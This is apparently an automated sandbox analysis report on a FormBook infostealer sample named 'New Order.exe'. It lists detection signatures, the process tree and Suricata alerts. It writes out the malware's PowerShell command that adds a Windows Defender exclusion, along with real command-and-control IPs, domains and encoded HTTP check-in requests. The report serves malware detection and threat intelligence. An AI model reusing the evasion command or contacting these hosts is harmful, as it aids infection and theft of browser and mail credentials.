Windows Analysis Report
New Order.exe

Overview

General Information

Sample name: New Order.exe
Analysis ID: 1567406
MD5: 8ef36959a2cedc10c4c6036c2360e105
SHA1: 96c17b47e3bbcd645fdf24b3a7b3319848fb62ed
SHA256: c8e6b3d94513f697d73e00d43476dddd0abdaf8d5cc6954a1218571dbccec61e
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
    • powershell.exe (PID: 5424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Order.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
    • New Order.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
      • XVZmwHdSYwx.exe (PID: 3084 cmdline: "C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • w32tm.exe (PID: 8052 cmdline: "C:\Windows\SysWOW64\w32tm.exe" MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
          • XVZmwHdSYwx.exe (PID: 5868 cmdline: "C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
8.2.New Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.New Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 3224, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 5424, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 3224, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 5424, ProcessName: powershell.exe

                AV Detection

                Source: New Order.exeReversingLabs: Detection: 57%
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: New Order.exeJoe Sandbox ML: detected
                Source: New Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: w32tm.pdb source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XVZmwHdSYwx.exe, 0000000D.00000002.4632680489.000000000075E000.00000002.00000001.01000000.0000000C.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4628553874.000000000075E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Order.exe, New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0096CE00 FindFirstFileW,FindNextFileW,FindClose,14_2_0096CE00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 4x nop then jmp 074A85DCh1_2_074A86AC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then xor eax, eax14_2_0095A020
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then mov ebx, 00000004h14_2_032804D8

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49830 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49830 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49870 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49889 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49889 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49907 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49928 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49946 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49922 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49965 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49965 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49981 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50034 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50042 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50042 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49960 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50053 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49883 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49876 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50052 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50060 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49916 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50061 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49953 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50043 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50055 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50055 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50047 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50050 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50054 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50046 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50050 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50057 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50046 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50059 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50059 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50056 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50058 -> 85.159.66.93:80
                Source: DNS query: www.aiactor.xyz
                Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.aiactor.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /k6jo/?u6nP_F48=g2gBEi9B+HDFGx1wG+72kN8Yj19AUdr4Nr1Jd72ZJlQgpbXPbifaD6lB1zmlmZG8AmkyaCU7LvK0zzlsdiU5EFaXnjyK5oQQkYGW08c3lB7eL51xgHFAptm5WP0FkXlczfO1jHA=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.jijievo.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.inspireto.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.717hy.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.bootleggersrt.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.lgdiamonds.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.funnystory.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.614genetics.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /tb3j/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=KSHFFnYTGWj/ZMhm+avBOUk2TTzM3y8YS8Rf4LhuEMPHAxZPTsF4EjHc/8b3mL3nQQOBHU115ds5/08vb05btA7AesMNksIJY0axPJ9FedzLP3Na7bRMzIAWWfH5e2OB5R7SOhY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.hm35s.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gravendeel.studioConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.kvsj.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
